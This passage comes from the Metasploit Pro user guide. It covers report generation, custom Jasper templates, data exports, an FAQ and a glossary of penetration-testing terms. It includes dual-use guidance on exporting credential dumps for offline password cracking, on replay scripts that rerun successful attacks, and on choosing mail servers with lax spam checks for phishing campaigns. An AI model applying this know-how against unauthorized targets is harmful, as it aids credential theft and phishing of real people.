1. Custom Report Collateral - Upload Jasper templates and logos that can be used for customizing reports. Supported collateral types include Jasper report templates and image files, such as JPEG, PNG, andGIF. 2. Custom Report Template - Select the template that you want to use to create your report. 3. File Format - Select the output format you want to use to generate the report. The form automatically displays the output formats that are supported for the report type that is currently selected. All reports support PDF, RTF, and HTML. Some reports, like the Web Application Assessment Report, do not support Word. 4. Name - Specify the name that you want to save the report as. This is the report name you will see when you view the Reports List or when you download the report. 5. Address Settings - Use the Included addresses field to create a white list or use the Excluded addresses field to create a black list. A white list explicitly defines the hosts you want to include in the generated report. A black list, on the other hand, explicitly defines the hosts you want to exclude from the report. 6. Cover Logo - Specify the logo that you want to apply to the report. 7. Email Report - Automatically sends the finished report to a list of comma separated or semi-colon separated e-mail addresses.
437
ActivityReport
Description Output formats Generates a human readable version of the activity log. PDF, HTML, RTF Mask discovered credentials - Removes all credentials, including plain text passwords, hashes, and SSH keys, from the report. The Audit report will display the user name with a blank password. Report options Include session details - Shows the details for each session Metasploit Pro was able to open, such as the session type and attack module that Metasploit Pro used to obtain the session. Include charts and graphs - Includes visual aids, such as pie graphs, to accompany statistical findings in the report. Report sections Cover, Project Summary, and Task Details
Audit Report
Description Output formats Provides a comprehensive and detailed report of the project findings. PDF, HTML, WORD, RTF Mask discovered credentials - Removes all credentials, including plain text passwords, hashes, and SSH keys, from the report. The Audit report will display the user name with a blank password. Report options Include session details - Shows the details for each session Metasploit Pro was able to open, such as the session type and attack module that Metasploit Pro used to obtain the session.
438
Include charts and graphs - Includes visual aids, such as pie graphs, to accompany statistical findings in the report. Executive Summary and Tags, Compromised Hosts, Compromised Credentials, Report sections Report directory Report template Discovered OSes, Discovered Hosts, Host Details, Discovered Services, and Web Sites /path/to/metasploit/pro/reports/audit/ /path/to/metasploit/pro/reports/audit/msfxv3.jrxml
439
accompany statistical findings in the report. Report sections Report directory Report template Project Summary, Executive Summary, Evidence Summary Table, Complete Evidence Table, Collected Screenshots, and Collected Text Files /path/to/metasploit/pro/reports/audit/ /path/to/metasploit/pro/reports/audit/msfxv3.jrxml
FISMACompliance Report
Description Output formats Reports on FISMA compliance criteria. PDF, HTML, WORD, RTF Mask discovered credentials - Removes all credentials, including plain text passwords, hashes, and SSH keys, from the report. The Audit report will display the user name with a blank password. Report options Include session details - Shows the details for each session Metasploit Pro was able to open, such as the session type and attack module that Metasploit Pro used to obtain the session. Include charts and graphs - Includes visual aids, such as pie graphs, to accompany statistical findings in the report.
440
PCICompliance Report
Description Output formats Reports on PCI compliance criteria. PDF, HTML, WORD, RTF Mask discovered credentials - Removes all credentials, including plain text passwords, hashes, and SSH keys, from the report. The Audit report will display the user name with a blank password. Report options Include session details - Shows the details for each session Metasploit Pro was able to open, such as the session type and attack module that Metasploit Pro used to obtain the session. Include charts and graphs - Includes visual aids, such as pie graphs, to accompany statistical findings in the report. Report sections Report directory Report template Executive Summary, Requirements Status Summary, Host Status Summary, Detailed Findings /path/to/metasploit/pro/reports/audit/ /path/to/metasploit/pro/reports/audit/msfxv3.jrxml
Services Report
Services Output formats Reports on all network services that were scanned or imported. PDF, HTML, WORD, RTF Mask discovered credentials - Removes all credentials, including plain text passwords, hashes, and SSH keys, from the report. The Audit report will display the user name with a blank password. Report options Include session details - Shows the details for each session Metasploit Pro was able to open, such as the session type and attack module that Metasploit Pro used to obtain the session. Include charts and graphs - Includes visual aids, such as pie graphs, to accompany statistical findings in the report. Report sections Report directory Report template Project Summary, Executive Summary, Network Service Summary, Network Services Table /path/to/metasploit/pro/reports/audit/ /path/to/metasploit/pro/reports/audit/msfxv3.jrxml
441
442
Report started - This status indicates that the report has started generating. Report finished -This status indicates that the report was generated without errors and is ready for you to view and download. You can click on the alert to open the report. When you open the report from the Notification Center, it displays a unified view of the report and shows the formats that are available for it. You can click on any of the format icons to view the report in the selected format. Problem with report - This status indicates that there was an issue with the report and it was not able to finish. You will need to view the report log to troubleshoot the issue. For more information on report logs, see Report Logs on page 434.
443
The Reports page appears with the Generate Standard Report tab selected. 3. Click the Report type dropdown and choose the report you want to generate.
For more information on the report types that are available, see Metasploit Report Types on page 438. 4. Choose the file formats you want to generate for the report.
You can generate multiple formats for a report at the same time. Most reports can be generated as PDF, Word, RTF, or HTML documents; however, the Web Application Assessment Report cannot be generated as a Word file. 5. Enter a name for the report in the Report Name field. (Optional)
If you do not specify a name, Metasploit Pro uses the report type and the timestamp. For example, an Audit Report will be named Audit-20140106140552. 6. Use the Included addresses to explicitly define the hosts you want to include in the report. (Optional) For example, if you only want to include specific hosts in the report, you should define those hosts in the Included Addresses field. All other hosts will not be included in the report.
444
7. Use the Excluded addresses to explicitly define the hosts you want to exclude from the report. (Optional) For example, if you only want to exclude specific hosts from the report, you should specify those hosts in the Excluded Addresses field. All other hosts will be included in the report. 8. Click the Campaign dropdown and select the campaign you want to use to create a report. (Social engineering reports only) The report form only displays the campaigns that are stored in the project. 9. Click the CoverLogo dropdown and select the logo that you want to use on the cover page of the report.
If you have not uploaded a logo to the project, you must upload the logo that you want to use to the Custom Report Collateral area of the project. For more information on uploading a logo, see Adding a Custom Logo to a Report on page 457. 10. Select the report sections that you want to include in the report. The report sections that are available will vary between reports. For more information on the sections available for each report, see Understanding Report Types on page 438. 11. Enable or disable any report options to manage the data that appears in the report. The report form displays the options that are applicable for the report type that you have selected. The following report options may be available:
l
Mask discovered passwords - Removes all credentials, including plain text passwords, hashes, and SSH keys, from the report. The report displays the user name and a blank password. Include session details - Shows the details for each session Metasploit Pro was able to open, such as the session type and attack module that Metasploit Pro used to obtain the session. Include charts and graphs - Includes visual aids, such as pie graphs, to accompany statistical findings in a report. Include web page HTML (in addition to image preview) - Includes the original page code as raw text as well as the rendered preview image. (Social Engineering Campaign Details Report only)
12. Enter the e-mail addresses you want to send the report to after the report generation. (Optional) You can use a comma or semi-colon to separate multiple e-mail addresses. To e-mail a report, you must have an active mail server configured through the Global Settings. For more information on setting up a mail server, see Defining SMTP Settings for a Mail Server on page 40.
445
13. Generate the report. When the report generation begins, the web interface redirects you to the ViewReports tab. At this point, you can navigate away from the Reports page to other areas in Metasploit Pro. The Notification Center will alert you when the report generation completes. When the report generation completes, you can click on the Notification Center icon to view the notification message or you can select Reports >Show Reports from the Project tab bar to access the Reports area. If an error occurred during report generation, you can view the report log to identify and troubleshoot any errors that occurred. For more information on report logs, see Report Logs on page 434.
When the report generation begins, the format button will be replaced with a progress indicator. The format button will reappear when the report is ready for you to view or download.
446
At this point, you can navigate away from the Reports page to other areas in Metasploit Pro. The Notification Center will alert you when the report generation completes. When the report generation completes, you can click on the Notification Center icon to view the latest notification message or you can select Reports >Show Reports from the Project tab bar to access the Reports area. If an error occurred during report generation, you can view the report log to identify and troubleshoot any errors that occurred. For more information on report logs, see Report Logs on page 434.
Generating a CustomReport
A custom report is created using a user-uploaded Jasper report template. The template defines the layout of the report and the sections that the report contains. You can create a report template from scratch using
Generating a CustomReport
447
a tool like iReport. For more information on custom templates, see Working with Custom Templates on page 461. Before you can generate a custom report, you must upload the template that you want to use to the Custom Report Collateral area of the project. If the project does not contain any custom report templates, the New Custom Report form will not load. Instead, the form displays a warning that the project does not contain any templates. You must upload a valid JRXML template to continue. For more information on uploading a custom template, see Uploading Templates on page 466.
3. Select the template you want to use to create the report. 4. Choose the file formats you want to generate for the report.
You can select multiple formats. All formats will be generated for the report at the same time. 5. Enter a name for the report in the Report Name field. (Optional)
If you do not specify a name, Metasploit Pro uses the report type and the timestamp. For example, an custom report will be named Custom-20140106140552. 6. Use the Included addresses to explicitly define the hosts you want to include in the report. (Optional) For example, if you only want to include specific hosts in the report, you should define those hosts in the Included Addresses field. All other hosts will not be included in the report. 7. Use the Excluded addresses to explicitly define the hosts you want to exclude from the report. (Optional)
Generating a CustomReport
448
For example, if you only want to exclude specific hosts from the report, you should specify those hosts in the Excluded Addresses field. All other hosts will be included in the report. 8. Click the Cover Logo dropdown menu and select the logo you want to display on the cover page of the report. (Optional)
If you do not select a logo, the report will use the default Rapid7 logo. 9. Enter the e-mail addresses you want to send the report to after the report generates. (Optional) You can use a comma or semi-colon to separate multiple e-mail addresses. To e-mail a report, you must have an active mail server configured through the Global Settings. For more information on setting up a mail server, see Defining SMTP Settings for a Mail Server on page 40. 10. Generate the report. When the report generation begins, the web interface redirects you to the ViewReports tab. At this point, you can navigate away from the Reports page to other areas in Metasploit Pro. The Notification Center will alert you when the report generation completes. When the report generation completes, you can click on the Notification Center icon to view the notification message or you can select Reports >Show Reports from the Project tab bar to access the Reports area. If an error occurred during report generation, you can view the report log to identify and troubleshoot any errors that occurred. For more information on report logs, see Report Logs on page 434.
Downloading a Report
1. Open the project that contains the report you want to download. 2. Select Reports >Show Reports from the Project tab bar. The Reports page appears.
3. Find the row that contains the report you want to view. The row displays the metadata and the file formats that have been generated for the report.
Downloading a Report
449
4. Click on the report name to open it. The unified report view will open and display a preview of the report. 5. Select the formats you want to download.
The formats that are available for the report will have an active checkbox located next to them. 6. Click the Download button located under the Report Actions area.
The download process will automatically start. If your browser is not configured to automatically download files, a dialog window will appear and prompt you to save or run the file. You will need to save the report to your computer.
Viewing a Report
1. Open the project that contains the report you want to view. 2. Select Reports >Show Reports from the Project tab bar. The Reports page appears.
Viewing a Report
450
3. Find the row that contains the report you want to view.
The row displays the metadata and the file formats that have been generated for the report. 4. Click on the format that you want to view the report in. The report will open in your browser.
E-mailing a Report
You can quickly share reports by e-mailing them as soon as they are generated. Both the standard and custom report generation forms have an Email Report field that enables you to define a list of e-mail recipients.
As long as you have a valid mail server configured for your Metasploit Pro instance, the report will automatically be sent to the e-mails you have listed.
E-mailing a Report
451
To clone a report:
1. Open the project that contains the report you want to delete. 2. Select Reports >Show Reports from the Project tab bar.
The Reports page appears. 3. Find the row that contains the report that you want to clone.
The New Report form appears.The form retains the configuration settings that you used to generate the original report.
Deleting Reports
When you delete a report, it will be permanently removed from the Reports directory, and you will no longer be able to view it from the Reports area of the web interface. Please make sure that you have the data that you need from the report before you delete it.
Deleting Reports
452
To delete a report:
1. Open the project that contains the report you want to delete. 2. Select Reports >Show Reports from the Project tab bar.
The Reports page appears. 3. Select the report or reports that you want to delete. 4. Click the Delete button located in the Quick Tasks bar.
The browser will ask you to confirm that you want to delete the report. 5. Select OK to delete the report.
Deleting Reports
453
To exclude specific sections, you can deselect the sections you do not want to appear in the report. When you generate the report, you will not see the excluded sections in the report. Additionally, the report will only show content for the sections for which it has data. For more information on report sections, see Metasploit Report Types on page 438.
454
455
To mask credentials from a report, you need to select the credential masking option on the New Report form. Select the Mask discovered credentials option to enable credential masking in your report.
When the masking option is enabled, the reports will not display plaintext credentials. For example, when you view the generated Audit report, the Compromised Credentials section only shows the host addresses, services, and user names that were discovered. The password, hash, and key fields are blank.
Other reports, such as the PCI and FISMA reports, replace all credentials with <blank>.
456
and web pages used. The raw content for the target list and e-mail will automatically be included in the report. If you want to include the raw content for the web pages, you will need to enable the Include web page HTML option. If enabled, this option includes the HTML for each web page used in the campaign. A preview of the web page will render in the report if the web page was used as part of a campaign. Note: If the web page delivered malicious code, such as a client-side exploit, Java applet, or executable file, a preview will not be rendered for the web page. If you want to include the raw HTML that was used to create a web page and a preview of the web page, you can select the Include web page HTML option on the New Report form.
457
Logo Requirements
The logo area on the cover page is 320 x 320 pixels. You can upload an image that is larger than the logo area, but the logo will be resized to fit the cover page.
If the image is larger than the logo area, the height of the image will be preserved, but the width will be resized.
458
The Open dialog window appears. 6. Browse to the location of the logo file. Note: You can upload a GIF, JPEG, JPG, or PNG file.
459
7. Select the logo file and click the Open button. 8. Enter a name for the file in the Descriptive Name field. (Optional)
If you do not specify a name, the Custom ReportCollateral area shows the original file name. 9. Click the Upload button. The file appears under the Custom Report Collateral area.
If the project does not contain any logos, the New Report form will display a link to the Custom Reports page where you can upload your logo.
460
JasperReports documentation list - A list of the documentation that is available for JasperStudio, JasperReports Server, JasperReports Library, and iReport Designer. You can access this list at the following URL: http://community.jaspersoft.com/documentation.
461
JasperReports Library materials reference - A list of the documentation, webinars, and articles that may be helpful for working with JasperReports. You can access this list at the following URL: http://community.jaspersoft.com/wiki/jasperreports-library-reference-materials. iReport Designer tutorials and help wiki - A wiki that lists the tutorials that are available for iReportDesigner. You can access this list at the following URL: http://community.jaspersoft.com/wiki/ireport-designer-tutorials-help. An article on chart customizations - A useful list of chart customizers for JasperReports, iReport Designer, and JasperReports Server. You can view this article at the following URL: http://mdahlman.wordpress.com/2011/04/17/chart-customizers-2/. Groovy documentation - Groovy is a Java-compatible scripting language that you can use in place of Java to define expressions in iReport.
To learn more about how Groovy and iReport Designer work together, visit the iReport wiki here: http://http://community.jaspersoft.com/wiki/ireport-designer-groovy. To learn more about Groovy, you can view their documentation here: http://groovy.codehaus.org/.
Jaspersoft training - To learn more about Jaspersoft training, you can visit https://www.jaspersoft.com/training-services or https://www.jaspersoft.com/training.
Experience with Jasper iReport, JasperReports, XML, and SQL/XPath Experience with Java or a Java scripting language, like Groovy or Javascript A working instance of JasperiReport Access to theMetasploit database
The database name - The default database name is msf3. The postgresql port - The default postgresql port is 7337. The user name - The default user name is msf3. The password - Please view the database.yml file for your database password.
462
The Datasource window appears. 3. Select Database JDBC connection from the list of data sources.
463
464
9. Test the connection. If the connection is working properly, a window appears and alerts you that the connection was successful. Otherwise, if the connection fails, an exception window appears and alerts you that there is an issue with your database settings. You will need to verify that your database settings match the information in the database.yml file. 10. Save the connection, if the connection was successful. You are now ready to create your report template. For resources on creating report templates, see Resources for JasperReports and iReport Designer on page 461.
465
Uploading Templates
After you have created your custom template, you will need to upload it to the project you want to use to build the custom report. The template will only be available to the project that you have uploaded it to; therefore, if you want to use the template across multiple projects, you will need to import the template into each project. When you view the New Custom Report form, the template will be available in the Report Template dropdown menu.
466
To upload a template:
1. Open the project you want to use to store the custom template. 2. Select Reports >Create Custom Report from the Project tab bar.
The Reports page appears with the Generate Custom Report tab selected. 3. Find the Custom Report Collateral area.
If your project does not contain any templates, the New Custom Report page will not show the form. 4. Click the Upload Custom Report Collateral button.
Uploading Templates
467
The Open Dialog window appears. 6. Browse to the location of the logo file. 7. Select the template and click the Open button. The template must have a JRXML extension. 8. Enter a name for the template in the Descriptive Name field. (Optional)
If you do not specify a name, the Custom ReportCollateral area shows the original file name. 9. Click the Submit button. The template appears under the Custom Report Collateral area.
You are now ready to generate a custom report. For more information on generating custom reports, see Generating a CustomReport on page 447.
Uploading Templates
468
The Reports page appears with the Generate Custom Report tab selected. 3. Find the Custom Report Collateral area.
4. Find the row that contains the custom report template you want to download.
The row displays the metadata and the actions that are available for the custom report template. 5. Click the Download link.
The download process will automatically start. If your browser is not configured to automatically download files, a dialog window will appear and prompt you to save or run the file. You will need to save the template to your computer.
469
The Reports page appears with the Generate Custom Report tab selected. 3. Find the Custom Report Collateral area.
4. Find the row that contains the custom report template you want to delete.
The row displays the metadata and the actions that are available for the custom report template. 5. Click the Delete link.
The browser will prompt you to confirm that you want to delete the custom report template.
470
471
4. Click the Download Example Template link, which is located below the reports table.
The download process will automatically start. If your browser is not configured to automatically download files, a dialog window will appear and prompt you to save or run the file. You will need to save the report to your computer.
472
Exporting Data
A data export enables you to routinely back up project data and create an archive of your tests. When you export data from a project, its contents are copied and saved to a file that can be imported into other projects or shared with other instances of Metasploit Pro. All exports can be downloaded from the Exports area of the web interface or from the exports directory.
Exports Directory
When Metasploit Pro generates an export, it stores a copy of the file in /path/to/Metasploit/apps/pro/exports. The files that are stored in this directory will match the list of exports displayed in the web interface. You can go to the exports directory to download or view exported data; however, you should not make any changes directly to the default exports directory. If you need to modify the export files, you should make a copy the exports directory and make your changes from the new directory. Any changes that you make directly to the export files can cause disparities between the metadata that displays for the file in the webinterface and the file itself. If you need to remove exports from a project, you should do it from within the web interface. Do not delete them directly from the exports directory.
Export Logs
The export log maintains a historical record of all export-related events. Metasploit Pro automatically updates the export log each time you export data from a project. If you experience any issues with an export, you can view the export log to find stack trace errors and troubleshoot them.
Exporting Data
473
Export started - This status indicates that the export has started. Export finished -This status indicates that the export has completed without errors and is ready for you to download. You can click on this alert to open the Exports page, which will list all of the export files that have been generated for the project. You can sort by the creation date to find the latest export file. Problem with export - This status indicates that there was an issue with the export and it was not able to finish. You will need to view the export log to troubleshoot the issue. For more information on export logs, see Export Logs on page 473.
Export Types
Metasploit Pro offers the following export types:
l
XML export - An XML file that contains the attributes for most of the objects in a project and can be imported into another project. XML exports are particularly useful if you have a data set that you want to reuse in another project or share with another instance of Metasploit Pro. For example, you can export an XMLof project data if you want to reuse the scan data from a particular project.
474
Workspace ZIP - A zip that contains an XML export and any loot files, report files, and tasks logs. This export type is useful if you want to back up the data and contents in a project or share the project with other instances of Metasploit Pro. Replay script - A batch file that reruns tasks that opened sessions on target hosts. A replay script consists of multiple resource files (.rc). Metasploit Pro creates a resource file for each session it opens. You can run a replay script from the pro console or msfconsole. PWDump - A text file that contains all of the credentials for a project, including plaintext passwords, SMB hashes, and SSH keys. Credentials can be masked to enumerate user names only.
XMLExports
When you export your project as an XML file, it contains most of the data that you see from the Analysis area of a project--with a few exceptions. The exported XML file contains most of the objects in a project's database and their attributes; it does not include any files that are associated with the objects in a project, such as task logs, generated reports, and loot files. When you view the XML export file, you will see the following objects:
l
Hosts - Contains the details for each host in the project, including the following attributes: notes, tags, vulnerabilities, credentials, and sessions. It also include host details, such as the host ID, IP address, MACaddress, host name, OS name, OS flavor, OSservice pack, and purpose. Events - Contains the event log for the project. Each event includes the workspace ID, event creation date, event name, and name of the user who launched the task. Sessions - Contains the details for each session obtained in the project, including the following attributes: host ID, session type, module used, session description, port used, and session open/close dates. Services - Contains the details for each service discovered in the project, including the service ID, host ID, port number, protocol type, state, service name, creation date, and modification date. Credentials - Contains the details for each credential stored in the project, including the credential ID, service ID, user name, password, creation date, and modification date. Web sites - Contains the details for each web server discovered, including the website ID, service ID, host address, VHOST address, HTTP port, creation date, and modification date. Web pages - Contains the details for each web page discovered, including the web page ID, HTTP response code, VHOST address, web server address, HTTP port, content type, page content, creation date, and modification date. Web forms - Contains the details for each web form discovered, including the web form ID, form path, request method, VHOST address, web server address, HTTP port, content type, page content, creation date, and modification date. Web vulnerabilities - Contains the details for each web vulnerability discovered, including the vulnerability category, vulnerability description, vulnerability confidence ranking, request method, vulnerability name, HTTP port, proof text, VHOST address, and vulnerability blame.
Export Types
475
Note: Additional attributes may be available for each object; however, this list covers the most common attributes for each object.
4. Replace the export file name with a custom name, if you do not want to use the default name. (Optional) 5. Define the hosts you want to explicitly include in the Included addresses field. (Optional) 6. Define the hosts you want to explicitly exclude in the Excluded addresses field. (Optional) 7. Select the Mask credentials option from the Export Options section if you do not want to include credentials in the export. The credentials will be replaced with **MASKED** in the XML file. If you import the XML file into a project, the credentials will not be included. 8. Click the Export Data button. When the export begins, you will be taken back to the Exports page. The Exports page displays an "Export creation queued" message.
Export Types
476
The Notification Center icon will turn green and alert you when the export starts and completes. You can click on the Notification Center icon to view a list of system wide alerts. When the export completes, you can click on the notification message or you can select Exports >Show Exports from the Project tab bar to access the Exports area. When the export is ready, it will listed be at the top of the Exports List. It will use the following naming convention: export-[current date and time]. If you do not see it at the top of the Exports List, click on the Create Date column name to sort the list by descending creation date. If an error occurred during the export and the export was unable to complete, you can view the export log to identify and troubleshoot any errors that occurred. For more information on export logs, see Export Logs on page 473.
Workspace ZIP
A workspace ZIP contains an XML export, which details the attributes for most of the objects in a project, and any associated directories that contain loot files, report files, and tasks logs. You can export a workspace ZIP to make a copy of a project, its data, and its files. This is useful when you want to back up your findings or when you want to import the data into other projects. When you export a project, Metasploit Pro generates a ZIP file that contains the following:
l
Exported XML file - Contains most of the objects in a project, including hosts, services, sessions, credentials, module details, and events. Reports directory - Contains all of the generated reports for the project. Tasks directory - Contains texts file that detail each task run. Loot directory - Contains the loot files for the project, including hashes and SSH keys.
4. Replace the export file name with a custom name, if you do not want to use the default name. (Optional)
Export Types
477
5. Use the Included addresses to explicitly define the hosts you want to include in the export. (Optional) 6. Use the Excluded addresses to explicitly define the hosts you want to exclude from the export. (Optional) 7. If you do not want to include credentials in the export, select the Mask credentials option from the Export Options section. 8. Click the Export Data button. When the export begins, you will be taken back to the Exports page. The Exports page displays an "Export creation queued" message. The Notification Center icon will turn green and alert you when the export starts and completes. You can click on the Notification Center icon to view a list of system wide alerts. When the export completes, you can click on the notification message or you can select Exports >Show Exports from the Project tab bar to access the Exports area.
The ZIP file will listed be at the top of the Exports List. It will use the following naming convention: export-[current date and time]. If you do not see it at the top of the Exports List, click on the Create Date column name to sort the list by descending creation date. If an error occurred during the export and the export was unable to complete, you can view the export log to identify and troubleshoot any errors that occurred. For more information on export logs, see Export Logs on page 473.
Replay Scripts
A replay script is a batch file that reruns tasks that opened sessions on target hosts. You can export a replay script to automate successful attacks through the pro console or msfconsole. When you export a replay script, Metasploit Pro creates a resource file for each opened session and compresses them into a ZIP file.
Export Types
478
4. Use the Included addresses to explicitly define the hosts you want to include in the replay scripts. (Optional) 5. Use the Excluded addresses to explicitly define the hosts you want to exclude from the replay scripts. (Optional) 6. If you do not want to include credentials in the export, select the Mask credentials option from the Export Options section. 7. Click the Export Data button. When the export begins, you will be taken back to the Exports page. The Exports page displays an "Export creation queued" message. The Notification Center icon will turn green and alert you when the export starts and completes. You can click on the Notification Center icon to view a list of system wide alerts. When the export completes, you can click on the notification message or you can select Exports >Show Exports from the Project tab bar to access the Exports area. The ZIP file will listed be at the top of the Exports List. It will use the following naming convention: export-[current date and time]. If you do not see it at the top of the Exports List, click on the Create Date column name to sort the list by descending creation date. If an error occurred during the export and the export was unable to complete, you can view the export log to identify and troubleshoot any errors that occurred. For more information on export logs, see Export Logs on page 473.
Export Types
479
Note: Before you can run the resource file, you will need to extract them from the ZIP file.
PWDumps
A PWDump is a text file that contains all of the credentials for a project, including plaintext passwords, SMB hashes, and SSH keys. You can export a PWDump file to perform offline password cracking with a tool like John the Ripper.
Exporting a PWDump
1. Open the project from which you want to export data. 2. Select Exports >Export Data from the Project tab bar. The Export Data page appears.
4. Use the Included addresses to explicitly define the hosts you want to include in the export. (Optional) 5. Use the Excluded addresses to explicitly define the hosts you want to exclude from the export. (Optional) 5. Click the Export Data button. 6. When the export begins, you will be taken back to the Exports page. The Notification Center icon will turn green and alert you when the export starts and completes. You can click on the Notification Center icon to view a list of system wide alerts. When the export completes, you can click on the notification message or you can select Exports >Show Exports from the Project tab bar to access the Exports area. The PWDump will listed be at the top of the Exports List. It will use the following naming convention: export-[current date and time]. If you do not see it at the top of the Exports List, click on the Create Date column name to sort the list by descending creation date. If an error occurred during the export and the export was unable to complete, you can view the export log to identify and troubleshoot any errors that occurred. For more information on export logs, see Export Logs on page 473.
Export Types
480
481
FrequentlyAsked Questions
The following section provides answers to some of the most commonly asked questions, including:
l
How do I restart the Metasploit service on Linux? on page iv How do I restart the Metasploit service on Windows? on page v I set up my mail server, but it's not sending any e-mail. How can I troubleshoot this issue? on page ii Where do I configure the SMTP settings for my mail server? on page iii Why is there a partial blank screen on the video tutorials? on page iv How do I generate the diagnostics logs? on page ii My targets are behind a NAT gateway. How can I connect to them? on page 1
Linux
For Linux systems, open a command line terminal and run the following command: $ sudo bash /opt/metasploit-<version> ctlscript.sh restart
Windows
For Windows systems, choose Start > Programs > Metasploit > Services > Stop Services. Then, choose Start > Programs > Metasploit > Services > Start Services to restart the Metasploit service.
I set up my mail server, but it's not sending any e-mail. How can I troubleshoot this issue?
To troubleshoot this issue, you need to take a look at the task log. To access the task log, click the Tasks tab. Find the campaign task and click on the task name. When the task log appears, search for any text highlighted in red. Any red text indicates that Metasploit encountered an error while processing the task. Errors like Server refused our mail indicates an issue with the mail server being able to authenticate the login or send the e-mail. Here are some of the most common restrictions that may prevent you from using your mail server to send phishing e-mails:
l
Your mail server performs reverse DNS checks and has rejected mail from Metasploit because it thinks that the e-mail is spam. If this is the case, you need to use a mail server that has less restrictive checks for spam, malicious files, and any type of e-mail abuse. Although these checks are in place to ensure that your e-mail infrastructure is secure, they prevent you from sending e-mails from Metasploit Pro. The port that you are using to send mail is blocked. The most common port used to send mail is port 25. If this port is blocked, try ports 465, 587, or 2525. The mail server is unable to authenticate the login. Check the authentication type configured for your mail server. By default, Metasploit uses the plain auth type.
FrequentlyAsked Questions
ii
Nmap 6 is the latest version, so why does the Discovery Scan say that it sweeps with Nmap4 probes ?
Nmap4 does not stand for Nmap version 4.It stands for IPv4.
FrequentlyAsked Questions
iii
FrequentlyAsked Questions
iv
FrequentlyAsked Questions
How long does it take for Metasploit Pro to update the findings?
Typically, it will take the campaign a few seconds after the human target performs an action to update the Campaign Findings.
FrequentlyAsked Questions
vi
4. Click on the name of a human target to view their campaign history. Any data that they have submitted will be stored on this page.
Why arent the findings updating after a human target opens a web page or submits a form?
If the human target is part of another campaign, and has already visited a spoofed web page or submitted data, a cookie has already been set for their browser. The human target will have to clear their browser cache in order for the campaign to start tracking them again.
Why cant I view an image preview of my web pages in the campaigns report?
If you are running Metasploit Pro on a Linux system, you need to install the virtual frame buffer, or Xvfb, package to generate image previews in the campaigns report. To install the Xvfb package on Ubuntu, open a terminal and run the following command: $ sudo apt-get install xvfb To install the Xvfb package on CentOS, open a terminal and run the following command: $ sudo yum install xorg-x11-server-Xvfb If you are on Windows or if you are on Linux and have the Xvfb package installed, and the image preview is not being generated, it may be because the web page component uses an attack module. If the campaign uses a web page attack, a preview for the web page will not be generated for the report.
FrequentlyAsked Questions
vii
How can I view the settings that were used for a MetaModule run?
The Metasploit web interface does not provide a way for you to view the settings that were used for a MetaModule run. However, you can review the generated MetaModule report to see some of the settings, such as the target network range and credentials that were used.
Exploited - Metasploit Pro was able to exploit the vulnerability to obtain a session on the target. Not Exploitable - Metasploit Pro was unable to exploit the vulnerability.
How can I rerun the Vulnerability Validation Wizard using my previous configuration?
Metasploit Pro currently does not provide the ability to rerun tasks created by the Vulnerability ValidationWizard.
FrequentlyAsked Questions
viii
Why did Metasploit Pro not import all vulnerabilities from my Nexpose site?
Metasploit Pro only imports vulnerabilities for which it has correlating exploit modules. If Metasploit Pro does not have a matching exploit in its database, it will not import the vulnerability from a site.
How can I view the attack plan without actually running exploits?
You can select the Dry run option on the Exploit tab. Metasploit Pro creates the attack plan and prints it in the Task Log.
FrequentlyAsked Questions
ix
Glossary
Administrator
An account that provides unrestricted access to manage user accounts, install updates, and configure global settings in Metasploit Pro.
Asset
A Nexpose term for a host or target that Nexpose scans for vulnerabilities.
Asset Group
A Nexpose term for a collection of assets.
Auxiliary Module
Any module that does not deliver a payload and does not obtain a shell on a remote target. An auxiliary module provides additional support for tasks that you need to perform a penetration test, such as scanning and fuzzing.
Bruteforce
A password cracking method that attempts a large number of user name and password combinations until it successfully obtains access to a target.
Campaign
A logical grouping of components that you need to perform a social engineering attack.
Client-Side Exploit
An exploit that attacks vulnerabilities in client software, such as web browsers, e-mail applications, and media players. A client-side exploit is different from a traditional exploit because it requires the victim to initiate the connection between their machine and an attacking machine.
Credentials
A user name and password combination that provides access to systems and accounts.
Data Exfiltration
A method of extracting data, such as simple file transfers that use netcat or ssh to perform a secure copy.
Glossary
xi
Discovery Scan
The internal Metasploit scanner that gathers port, service, and system information. It runs additional scanner modules based on the services that it identifies to gather more information about from the targets.
Egress Target
An external server hosted by Rapid7 that acts as an scan target. You can run the Firewall Egress Testing MetaModule against this target to identify open outbound ports from an internal host.
Exploit
An attack that leverages a vulnerability to deliver a payload to a target system.
Global Settings
Options that apply to all projects.
Host
A computer that is part of a network.
Host Comments
A tool that documents observations and information about a host.
Glossary
xii
Host Tags
A unique identifier used to categorize and group hosts.
Human Target
A person who is a recipient of a social engineering attack.
Keyword Expression
A combination of a keyword definitive and a keyword that can be used to search for hosts and modules.
Listener
A process that runs on an exploited machine and waits for a connection for a bind shell payload.
Lockout Risk
The likelihood that a service enforces an account lockout.
Macro
A script that automatically runs a set of post-exploitation modules.
Glossary
xiii
MetaModule
A feature that provides a wizard-like interface that guides you through the configuration of a module. Each MetaModule focuses on singular penetration testing task, such as firewall egress testing, credential testing, and passive network discovery scanning.
Metasploit Framework
An open source penetration testing and development platform that provides access to the latest exploit code for various applications, operating systems, and platforms.
Module
A standalone piece of code that runs tasks and exploits.
Module Ranking
A rank that indicates the reliability and stability of an exploit. The higher the ranking, the less likely the exploit will crash a service. Use the module ranking to determine whether or not the module can reliably identify a target version.
Nexpose
A vulnerability analysis tool that automates the detection of vulnerabilities on an asset.
Nexpose Push
The process of sending vulnerability exceptions or validated vulnerabilities back to Nexpose.
Notification Center
The notification system for Metasploit that alerts you when a task completes or when a software update is available.
Packet Capture
A process that makes copies of packets off the wire.
Glossary
xiv
Password Cracking
The process of reverting a password hash to plaintext.
Password List
A dictionary or list of common passwords. A password cracker uses the password list and encrypts each word until it finds a matching hash.
Payload
The code that executes on the target system after an exploit successfully executes.
Persistent Listener
A process that runs on the Metasploit machine and waits for connect backs for reverse payloads. A persistent listener is another term for a handler.
Phishing
Phishing is a social engineering technique that uses e-mail to acquire sensitive information, such as user names, passwords, and credit card information, from a human target.
Portable File
A file that can be used for a USB drive drop. A portable file can be a generated executable file or a file format exploit that you load onto a USB key.
Post-Exploitation
The phase that occurs after exploitation. During post-exploitation, the data on the exploited machine is analyzed to determine the value and usefulness of the compromised host. Post-exploitation tasks include identifying configuration settings and mapping the network topology.
Glossary
xv
Project
A container for the targets, tasks, reports, and data that are part of a penetration test.
Proxy Pivot
An attack method that uses a compromised system to attack other systems on the same network.
Report
A document that provides a detailed account of the information gathered in a project.
Scan Data
The host and vulnerability data imported from an external source, such as a vulnerability scanner like Nexpose and Nessus.
Session Fixation
